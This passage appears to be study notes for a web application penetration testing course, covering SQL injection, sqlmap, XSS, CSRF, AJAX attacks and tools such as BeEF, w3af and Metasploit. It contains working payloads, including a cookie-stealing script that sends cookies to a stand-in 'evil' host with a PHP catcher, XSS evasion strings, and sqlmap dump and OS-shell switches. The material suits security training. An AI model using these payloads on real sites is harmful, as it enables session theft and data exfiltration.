`SELECT * FROM users WHERE lname='Dent' UNION SELECT NULL, NULL;--`
The database will  throw an error until the correct number of columns is matched.  From there, determine the column type by adjusting each NULL to a string or number.  Typically need at least one String column to exfiltrate data.  You can also do this by using the `ORDER BY` clause.  Keep incrementing it until there's an error.

*Other potential attacks*:  Deleting/altering data, Injecting XSS payloads, DB privilege escalation, and reading & writing files.
Reading files 

* MySQL - `LOAD_FILE( ) `
* SQL Server - `BULK INSERT`

Writing files

*  MySQL - `INTO OUTFILE`, 

*OS interaction *such as SQL Server which includes many stored procs to interface the OS. 


*Writing Files (148)* - Can potentially lead to getting a remote shell.  DB needs a web frontend and the DB user account needs permission to write webroot files.  Can do without but requires stacked SQL ability. Think of this as a file upload flaw against the web server that allows us to write to directories where execution is possible.

*Cheatsheets (149) - *May not be up to date.

* http://websec.ca/kb/sql_injection
* http://websec.ca/kb/sql_injection
* http://sqlinjectionwiki.com/

*Tools (152) *- BBQSQL python based framework performs Blind SQLi attacks. Made by Neophasis Labs and debuted at DEFCON 20 - not maintained.  Two types of Blind SQLi: 
Binary Search - split chars sets in half and searches
Frequency search - based on letters' frequency in the English language.
Can look for true false or other indicators such as HTTP response, response time, content, data size, etc...

### sqlmap (154)

sqlmap: open-source, python-based, command line. Supports In-Band/Inline and Blind SQLi, MySQL, MSSQL, Oracle, PostgreSQL, SQLite, more...  integrates with Metasploit, w3af, Burp, ZAP.

**Switches:**
-u URL
--crawl  - Spider the site  (can use Burp or ZAP to spider then import)
--forms - target forms for injection “
--dbms  - inform sqlmap what we think the db is

**Sessions, Headers, Auth**
-r / -l  - Captured HTTP Request of proxy logs
--cookie
--user-agent - default is sqlmap
-c  - Config file
--referer - WAFs often check HTTP Referer.  Use this or a proxy or -r (previous request)
--proxy  - (e.g. —proxy [http://127.0.0.1:8080](http://127.0.0.1:8080/))  sqlmap does not automatically inherit Sessions in the proxy.  Need to configure the proxy. (160).  In ZAP go to Edit | Enable Session Tracking (Cookie).  In Burp go to “Session Handling Rules” in Options | Sessions

**DB Enumeration**
--schema -  dump entire DBMS database, table and column names
--exclude-sysdbs -  Ignore system databases
--dbs/—tables/—columns  - more tactical then dumping the full list with “—schema”
-D/-T  - coupled with above switches to limit to a Database or a Table

**Exfiltrate**
--all - Dump ALL data and metadata (!!!)
--count - No exfil, just count records
--dump  - Steal data given constraints (-D Order -T Customers —dump)
--dump-all - Exfil all table data
--search  - Scour DB/table/column for a string (e.g., user or password)

**Beyond Exfil**
--users  - enum DB user accounts
--passwords  - show DB user account hashes
--file-read  - download files to attack system
-- file-write  - Upload to the DB
--reg-read/—reg-write  - read/write Windows registry keys
--reg-add/reg-del
 
**Post Exploit**
--priv-esc
--sql-query/—sql-shell  - run single query or get interactive SQL DB shell
--os-cmd/—os-shell  Exec single OS command or get OS shell
--os-pwn  - OOB Metasploit shell/VNC/Meterpreter - requires out-of-band connection
Significant pre-reqs.  These usually require a web server with web root that DB account can write to. Most effective after pivoting or when the DB server is more directly accessible.

## 4 XSS 

### XSS (33)

### Same Origin Policy (35)

Web Clients should enforce same origin policy.  Client code from one server should not  access content from another. It is determined by HOSTNAME, PORT, and PROTO.  Hostname is used instead of IP because of sites with multiple servers acting as load balancers.
Page Loaded from http://www.seccom/

|http://www.seccom/product.php	|Allowed	|	|	|
|---	|---	|---	|---	|
|http://www.seccom/list/about.php	|Allowed	|	|	|
|http://www.seccom:8080/index.php	|Not Allowed	|Port	|	|
|https://www.seccom/product.php	|Not Allowed	|Protocol	|	|
|http://web.seccom/product.php	|Not Allowed	|Host	|	|
|http://www.network.org/product.php	|Not Allowed	|Host	|	|

### Searching For XSS

Every parameter that is displayed should be searched.  Start with what was found during mapping and fuzz them all.  Other avenues may be available too; Cookies, User-agents, HTTP Headers, referer, etc...

Apps may (and should be) filtering.  By *whitelists* or *blacklists*.  REGEX or platform libraries such as those used by .NET may be employed.
Bypassing (41) - Try 1) encodings such as Unicode or Hex 2) other scripts such as VBScript 3) scripting in tags other than` <script>`  Example, use Hex encoding for the SRC property of an img tag.

### Types (42) 

* Reflected - immediately reflected back to the browser, easiest to detect
*  Persistent - persisted on the server that could be accessed later in another page and potentially by other users (such as in a forum post)
* DOM - D-XSS - Doesn't happen in the server application, happens on the client.  Values returned  (typically in response to a GET - but other avenues available) are executed within the DOM of the browser.
* Persistent Admin - Subtype of Persistent XSS.  The persisted attach code must typically be stored in data that will first be viewed by an admin, such as an approval process.  This attack typically provides admin access.

### XSS Tools (55)

*Proxies*, obviously.  

*xsssniper* - XSS discovery tool written in Python by Gianluca Brindisi.  Quick, basic testing for *reflected* XSS.  Following simple syntax will scan the URL, follow for additional URLS, and inject for any discovered forms.
`$xsssniper -u “[http://network.org”](http://secxn--org-9o0a/) —crawl —forms`
Use —proxy as well
github and brindi.si

*XSSer* - another purpose-build XSS discovery tool built in Python.  CLI or BTK GUI (unwieldy and awkward use of English).   `—heuristic` checks for filtering.  Bypass techniques:  `—Hex`, `—Dec`, ` —Une` and `String.FromCharCode()` .  Can also be pointed at a proxy.  In addition to bypass or evasion, can also attempt XSS discovery and exploitation using “special techniques” - selectable options to XSSer for discovering flaws  via:

* HTTP User-Agent
* HTTP Referer
* HTTP Cookies, and others...

*XSScrapy* - Recent XSS *spider* written in Python by Dan McInerny.  Uses “magic reflection injection string”  **9zqjx** then spiders for it to find instances of reflection thereby reducing false positives.  Based on results, it by default uses 3 payloads to focus on those locations showing reflection.  

* `'”()=<x>`
* `'”(){}[];`
* `JaVAscRIPT:promp(99)`

### XSS Fuzzing (63)

Discover XSS flaws.  3 steps/approaches:

1. Reflection tests - input unique strings (such as 424242424) and then spider output for them
2. Filter tests - Determine which chars get *filtered* or *encoded*:  `<>[]{}()$--'#”&;/`
3. POC payloads - `<script>alert(1);</script>`

**1) Burp Intruder**: Reflection tests.  **Battering Ram** submit payload to multiple position simultaneously.   **Grep Payloads**:  option to search the responses for the submitted payload.  Use together and follow up with **Sniper** to determine which injection point yielded the reflection.

**2) Check for filters (70)**, look for poor input filtering and output encoding errors.  Need to bypass browser control to test for server vulnerability.  App could be using whitelisting or blacklisting.  Determining whether and how filtering/encoding is employed directs the test.  Simple filtering/encoding of `<` and `>` is common, in response (Also, use OWASP resources):

* Target XSS payloads that don't use those chars
* Craft payloads to try and escape the filter logic
* Try encoding the data to bypass the filter

Beware of **browser false negatives** because most browsers provide XSS filtering (except Firefox, at this time - double check).  Need to bypass in order to test the application (users can never rely on browsers or underlying protocols for security).

* Use Firefox
* Use an old browser (beware of HTML5 problems)
* Fully disable XSS filtering in browser (may be difficult especially in Chrome)

**3) XSS POC**, use collections of XSS payloads.  Using all payloads as is is very noisy, throttle and also change payload as IDS or WAFs may detect their signature:  

* Fuzzdb “opt/fuzzdb/attack-payloads/xss”
* JBroFuzz: part of ZAP, /opt/jbrofuzz
* Burp Pro expands on payloads in the free version
* ZAP: has JBroFuzz and some fuzzdb
* XSSer:  has valid payload vectors list, can also be used in other tools.  

### XSS Exploitation (97)

HTTP GET method puts params in the URL.  POST inside the Request making it a little more difficult.  Run [get2post.py](https://github.com/MarkBaggett/MarkBaggett/blob/master/get2post.py) on server that you can pass a target URL and POST payloads as URL params, query params become POST payloads.

XSS allows to run custom code on the client:  Try 

1. reading cookies. First the client side code then the “cookie catcher” on a server.
    `<script>document.write('<img src=”http://evil.set/'+document.cookie+'”>')</script>
    ---
    <?php
    $cookies = $_SERVER['REQUEST_URI'];
    $output = "Received=".$cookies."\n";
    $fh =fopen("/tmp/cookiedump", "a+");
    $contents = fwrite($fh, $output);
    fclose($fh);
    ?>`
2.  redirecting the user
    `window.location.href=”[http://evil.site/”](http://evil.site/%E2%80%9D)
    `Change form action to submit to a site under your control:
    `document.forms[1].action=”http://evil.site”`
3. modifying the page content.

**Evasion**.  For more complex JavaScript create a script file and then load it.  Also, many sites are configured to filter input using blacklists which may be trivial to bypass. [Use OWASP  XSS filter evasion cheat sheet](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet).
Versions of attack `<script>alert(“XSS”);</script>`
IMG Tag: `<img src=”javascript:alert('XSS');”/>`
Malformed IMG tag `<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>`
Use HTML entities `<img src=javascript:alert(&quote;XSS%quote;) />`
Hex encoding  `<img src=616C657274281C5853531D29 />`

**BeEF** Browser Exploitation Framework - Tool enables attacker to focus on payload instead of how to get the attack to the client.  Current version is Ruby, old is PHP.  Injects hook.js using XSS attacks to turn the browser into a zombie.  It connects the victim's browser to the BeEF controller and use various modules to control the Zombie or redirect to a Metasploit server.  Modules available include:  

* clipboard stealing
* history browsing - send URLs to client and returns if user has visited.  Maps potential sites to attack with.
* request initiation - send HTTP requests to client browser which makes the request.  Good for CSRF.  Does not return content to the attacker.
* port scanning of internal network - can distribute access zombies to lower detection risk.
* browser exploits
* inter-protocol exploitation Takes advantage of protocol “junk”, like HTTP Headers, HTTP requests to servers, BindShell exploit payload.

### **AJAX EXPLOITS(130)** 

XMLHttpRequest object primary methods and properties:

* xmlhttp.open(“GET”, “[http://evil.site”](http://evil.xn--site-jb7a/)); setup the request
* xmlhttp.send() sends the request
* xmlhttp.onreadystatechange = AJAXProcess  - sets the function to be called when state changes 
* xmlhttp.readyState - property containing current ready state.
* xmlhttp.responseText - property containing contents of the response.

readyState possible values:
0 request is uninitialized
1 request has been set up
2 request has been sent
3 waiting for response
4 response is complete

`var xhttp = new XMLHttpRequest();`
`xhttp.onreadystatechange = function() {`
`   if (this.readyState == 4 && this.status == 200) {`
`      // Action to be performed when the document is read;`
`   }`
`};`
`xhttp.open("GET", "`filename`", true);`
`xhttp.send();`

AJAX sites often use mash-up techniques, pulling content from multiple sites.  Same Origin Policy can cause issues with this technique so developers often include proxying techniques (SOP says you can only access data from the same host, protocol, and port).  A proxy server builds pages with data from multiple sources.  If the URLs it accesses are parameterized then try to change what data it's pulling back.

AJAX doesn't add new attacks but greatly increases the attack surface, large amounts of client side code, often business logic is now on the client side.  Try attacking the order of business logic that the server may not expect (ie, shopping cart app that allows attackers to use the credit authorization before adding items to the cart so they can purchase with an authorization of 0 dollars). Typical attacks also work (SQLi, XSS). 

Difficult to map AJAX sites mainly because of dynamically generated links.  Burp and ZAP can sometimes handle.

Exploitation is not less possible but has to take into account the difficulties mentioned.   If a tool cannot discover flaws then it can't seed exploitation.  Best way is to manually seed (ie, SQLMap accepts parm from the command line.

**API Calls (142)** - Complex frameworks create opportunity for hacking.  AngularJS, JQuery, MooTools.  Beyond business logic flaws, much code that is unused and should NOT have been exposed.  Can make calls to these functions.  Libraries often downloaded from 3rd party sites.

During mapping discover all 3rd party libraries.  Look in source for comments about library and version.  May explain what the app is doing or may even directly introduce vulns.  (All libs should have been verified and unused code removed).  Most libraries should be discovered while spidering.  Parse and examine the code during this phase.  Look for interesting function like XMLHttpRequest calls or functions that load data from elsewhere or reference “sensitive” functionality or admin actions.

Study the frameworks, try calling functions without authentication, or recreating what the code would have done but bypassing auth or calling in different orders. Look for weaknesses or known flaws.

### Data Attacks/JSON

Because business logic for AJAX is on the client more data is needed and available to attackers, perhaps more data than is even necessary.   Data can come in any format, XML and JSON (JavaScript Object Notation) are the most common. XML is heavy, JSON lightweight.

eval function invokes JS compiler, will parse and compile JSON into an object.
`var myObj = eval('(' +myJSONtext + ')');`
Should only use `eval()` when code is trusted and competent.  Much safer to use the JSON parse.
JSON Format:

```
{
    "glossary": {
        "title": "example glossary",
        "GlossDiv": {
            "title": "S",
            "GlossList": {
                "GlossEntry": {
                    "ID": "SGML",
                    "SortAs": "SGML",
                    "GlossTerm": "Standard Generalized Markup Language",
                    "Acronym": "SGML",
                    "Abbrev": "ISO 8879:1986",
                    "GlossDef": {
                        "para": "A meta-markup language, used to create markup languages such as DocBook.",
                        "GlossSeeAlso": ["GML", "XML"]
                    },
                    "GlossSee": "markup"
                }
            }
        }
    }
}
```


Try manipulating the same way you would normal HTTP requests and responses.  Exploiting usually takes one of two forms:

1. Information disclosure (easiest to find) typically found by browsing with a proxy.  Devs typically send much more than what is needed but the code will just display what's needed.  Sometimes SQL error messages.  Code parses and displays a diff msg.
2. Inject flaws - proxy to intercept, SQLi and XSS are most common.  Look in proxy intercept at the data for results. 

## 5A XSRF, Logic Flaws, Tooling

### Cross-Site Request Forgery (XSRF)

OWASP Testing Guide [OTG-SESS-005](https://www.owasp.org/index.php/Testing_for_CSRF_(OTG-SESS-005)).
[XSRF](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)) takes advantage of a the trust a website has of user.  Takes advantage of a session a client has open with the server.  

1. Find predictable params on a site
2. Build a web page or email (or whatever) containing a request to that vuln transaction
3. Convince the user to access and trigger the request by making it available in a trusted way (appears as a valid server or email).
4. While the user's session is open to the insecure servers they open the attack webpage.
5. Content from the attackers page makes a request through victim's browser to the vulnerable website.
6. The attacker-crafted transaction will occur on the vulnerable server (server should be using XSRF tokens to protect itself).

### Detecting XSRF (11)

Not detected by automated scanners so this is a manual process.  Simple four-step process:

1. Review app logic (can use application mapping performed in first phase) find pages that perform sensitive actions with predictable params.
2. Create HTML doc referring the to the page.  Use IMG or IFRAME. 
3. Log into the app and access the document.
4. Verify this works.

`<img src=”[https://www.targetsite.com/transferTo?acct=12345&amt=1000000”](https://www.targetsite.com/transferTo?acct=12345&amt=1000000%E2%80%9D) />`
`OR`
`<iframe src=”[https://www.targetsite.com/transferTo?acct=12345&amt=1000000”](https://www.targetsite.com/transferTo?acct=12345&amt=1000000%E2%80%9D)></iframe>`

ZAP can generate the proof-of-concept HTML (currently for POSTs only).  Right-click on request and select “Generate Anti CSRF Form”.  Will gen a web page with submittable form containing params from the page.  

### Logic Attacks (27)

Logic attacks common with AJAX and Web2.0 techniques because much of the business logic resides on the client instead of the server.  Can walk through each step of a transaction and intercept each call.  Try calling these in different order or changing params (as you might be by-passing validation logic).  

Discovery is manual.  No automation tools because you most test for logic, not functionality.  Difficult to find these flaws, often more difficult to fix.  Might have to recommend alternative mitigations if the primary fix is architectural in nature.

## 5B Advanced Tools (47)

### Python for Pen Testing

Most common scripting tool used by pen testers, especially for automation of vulnerability discovery but useful in all areas:

* parse through web content for specific data
* harvesting usernames
* search if tokens are on all pages
* iterating through page IDs...

Any language supporting HTTP is fine.  A majority of pen testing tools written in Python, helps to know how to modify them for any specific situation.  Write web apps and client programs, simple scripting that is compiled at run-time into byte-code.  Released 1991 by Guido von Rossum.   Pre-installed on Linux and Mac, easy to install on Windows.  Python release 3.x series a few years ago, however it breaks backward compatibility with 2.x and many apps still 2.x compliant.   A lot of pen test focus on 2.x

Other notes:

* Vars don't have to be declared
* Lists can be used to store vars
* Dictionaries can store name/value pairs
* Comments, single line `#` or multi-line with `“””` or `'''`
* Blocks of code signaled with a` : `and followed by indented line (4 space recommended)
* No switch, use `if..else` or chain` if---elif---else`
* While and For loops.  `Continue` and `break` supported.
* functions defined with `def`
* Powerful standard library that includes HTTP, regular expression, gzip compression, sha1 hashing, HTML parsing.
* Built-in HTTP handlers (httplib, urllib, and urllib2)
    `import httplib
    conn = httplib.HTTPConnection(“[www.sans.org”](http://www.alteryx.xn--com-9o0a/))
    url = “/index.php”
    conn.request(“GET”, url)
    resp = conn.getresponse()`
* files objects created using open, other methods
    * `infile=open('usernames.txt', 'r')`
    * `read`
    * `realine`
    * `readlines`
    * `write`
    * `close`
    * `for line in infile:
            # do action per line`

### WPScan (66)

Automated scanning tool for enumerating WordPress flaws.  WP extremely popular, web-facing with many updates that often don't get patched.  Tool is “black-box” scanning tool specifically focused on WordPress.  Ubiquity of WP makes this tool, even with it's narrow focus, important. Open Source at GitHub:  https://github.com/wpscanteam/wpscan

Actively updated scanner with updates quickly following discovered vulns.  Update frequently `$wpscan.rb —update` 
Launch:  `$wpscan —url http://wp.wordpresssite.com`
Search results for vulns `[!] ....`  
Once vulns found use other tools to exploit (exploit-db, sqlmap, metasploit, etc...)

### Exploit-DB

[exploit-db](https://www.exploit-db.com/) - repository of exploits and proof-of-concepts rather than advisories.  Maintained by Offensive Security. Exploits for known vulns.  Pre-installed on Kali `/user/share/exploitdb`.  If scanners detect known vulns this is a place to look for exploits or other related code.  Others included metasploit...

(Use Google Cache to get downloads that may be blocked by IPS/firewalls)

### W3af (80)

Open Source web app scanner and exploitation (all steps involved in app testing) written in Python and runs on all platforms, maintained by Andres Riancho.  Has both command line and a GUI (GTK only).  W3af designed to perform the spidering portion of mapping, all server-side vuln discovery and exploitation.  Does this by bundling tools like SQLMap and BeEF.  Plugin based.  (In practice this tool has a difficult time finding vulns)

*GUI*
Uses Profiles to control what goes into a scan.  Create profiles of bundled scans/exploits.  Select a profile and then supply a target URL as the starting point. 

*Console*
`$cd /opt/w3af`
`$./w3af_console`
`w3af>>> plugins`
`w3af/plugins>>> output console`
`w3af/plugins>>> audit os_commanding`

Looks a lot like the metasploit console, used the same way.  Select plugins and their configs.

*Scripting*
Scripting with the console.  Enter w3af commands in a file and call `$w3af_console -s filename`

*Plugins*
Written in Python.  Primary way a tester can focus the test.  Written to the w3af framework.  Updated frequently so check for updates often.  Can configure plugins to customize the a test, save them to a scan profile for future, repeatable use and automation of application testing. 

Crawl Plugins
Spidering and crawling, covers both recon and mapping stages of web hacking.  Example plugins:  Robots Reader (robots.txt) Detect Transparent Proxy using TRACE methods, Google Spider (leverage Google Cache to collect content), and spider_man:  plugin that instantiates w3af as a proxy that can be guided by a browser which is very useful for AJAX, Java, or Flash heavy clients.

Evasion Plugins
Used with any plugin that makes requests and tried to evade detection by:

* Try to bypass typical mod_security installations
* Add self-referential dirs to URL `http://www.victim.com/.cgi-bin/./script.pl`
* Using hex encoding
* Randomly changing case of letters

Audit Plugins
Ties to the discovery phase of web hacking, looks for flaws like XSS, SQLi, Response splitting.  Build from info gathered from crawl plug-ins.  Examples

* sslCertification - finds issues with SSL configs
* unSS - determines if ssl content if available vi HTTP
* osCommanding -  Attempts to find command injection

Grep or Search Plugins
Find items of interest in responses from other requests (ie look for signs of code or directory traversal).  Can act as input to other plugins like getMails which is used in brute force attempts.   Examples:

* Path disclosure
* code disclosure
* AJAX code
* email addresses
* determine server language used. 

Brute Forcd Plugins
Find credentials in a site. Can info gathered by other plugins.  Available for Forms-based auth and HTTP Basic auth

### Metasploit (102)

Most popular exploit framework, both commercial and open source project.  Largest Ruby project.   Facilitates exploitation of known vulns but flexible and assists with creating new ones. Modular, separates exploits from payloads.  Plus auxiliary modules.  Most known for network pen testing still has some great web testing modules.  Still good for custom apps too.

Auxiliary Mods.  Many scanners in `/auxiliary/scanner`, more than 150 within `auxiliary/scanner/http`.  Can crawl/spider and mapping.  
 Use metasploit DB to store target URL, form info to make testing more efficient.  
Use one of the two basic spiders to crawl:  `auxiliary/crawler/msfcrawler`  `auxiliary/scanner/http/crawler`.  (Good but know replacement for Burp or ZAP's crawlers).

Use `db_import` to ingest data already collected from other tools such as NMAP and Burp.  Saves duplicate work and time.  `db_import -h` shows supported file types. (Not all web tools but many:  Acunetix, AppScan, Burp, NetSparker, Nikto, and Wapiti)

WMAP
Web scanning plugin built in written by Efrain Torres, not updated since 2012.  Serves as the interface to web-related modules.  Uses metasploit DB for finding targets and reporting. 

Tool Integration 
Metasploit DB - Can use output from tools especially from scanners which do a better job of recon and scanning.  Import their output into Metasploit DB.
BeEF -  Excels at hooking browsers but not much beyond the ephemeral browser.  Use to hook and then scan the browser or system for vulns then Metasploit to go deeper.  Persist exploitation through browser restart or even system restart, escalate privs, etc...

1. Enable metasploit /opt/beef/config.yml
2. Start Metasploit RPC.  In `msfconsole` type `load msgrpc ServerHost=127.0.0.1 Pass=password`
3. Update `config.yml` file in `extensions/metasploit`  (sometimes /opt/beef/extensions/metasploit).
4. Start BeEf and exploit

sqlmap - Integration both ways.  sqlmap docs refer to metasploit as Takeover Features.  Primarily uses it for shell, VNC, or even Meterpreter.  sqlmap.py 

* `--os-pwn`:  switch causes sqlmap to leverage metasploit, extends sqlmap `—os-shell` capabilities and extends with metasploit.
* `--priv-esc`: attempt priv escalation on Windows via Metasploit
* `--msf-path`:  path to local Metasploit install

Metasploit has sqlmap plugin for performing SQLi.

Primary use case for Metasploit for web app pen testing is exploitation of known vulns, unpatched apps.  Custom app testing can be facilitated via WMAP or auxiliary modules.  Examples

* CMS: WordPress, and WP plugins, Joomla, Drupal and Drupal modules:  Modules and plugins have to be updated separately and often are discovered by vuln scanners so companies are unaware of them.
* DBs MySQL, MSSQL, PostgreSQL, Oracle...
* SQLi
* Shellshock, Heartbleed, Drupalgeddon, etc...

Example:  **Drupalgeddon** (112) -Drupal 7.x installs have CVE-2014-3704 and a patch 10/15/2014.  Unauthenticated SQLi.  Unfettered data access, remote code execution, priv escalation.  Can be automated.  Most vulns in CMSs are in modules/plugins but this was core app. (Note this attack was so prevalent that attackers often patched the vuln after assuming control to prevent other attackers from doing the same.)  Drupal uses prepared stmts which are a mitigation to SQLi, but the code was using a PHP method` expandArguments()` to explode arrays into input that can be handled by prep stmts (and can be problematic for them).   The user input was also unsanitized so once broken out injection can occur.  Making it worse is that this programming technique supports multiple SQL calls where-as typical prepared statements do not.

`msf> use exploit/multi/http/drupal_drupageddon `
Console shows output but for more details use the set Proxies option. 
`msf> exploit (drupal_drupageddon) > set Proxies HTTP:127.0.01:8082`

### Pen Test Prep (154)

* Prep
* Manage The Test
* Scope
* Information gathering
* Rules of engagement
* ID tester traffic and app data
* Time Windows
* Communication planning

### Reporting (164)

Format:

1. Exec Summary - high-level description of test and findings, target audience is higher-level personnel, short: findings and recommendations
2. Intro - explain scope, define object, team and contact info.
3. Methodology -Including steps and tools, enough info so another pen tester would have what they need replicate.
4. Findings - Details.  Each finding and it's category (High/Medium/Low) risks, notes, likelihood.  Recommendations & mitigations.
5. Conclusion - sort of similar to exec summary but answering tech questions for those who will remediate.   Appendixes: perms, users harvested, records from DBs, detailed tool output...


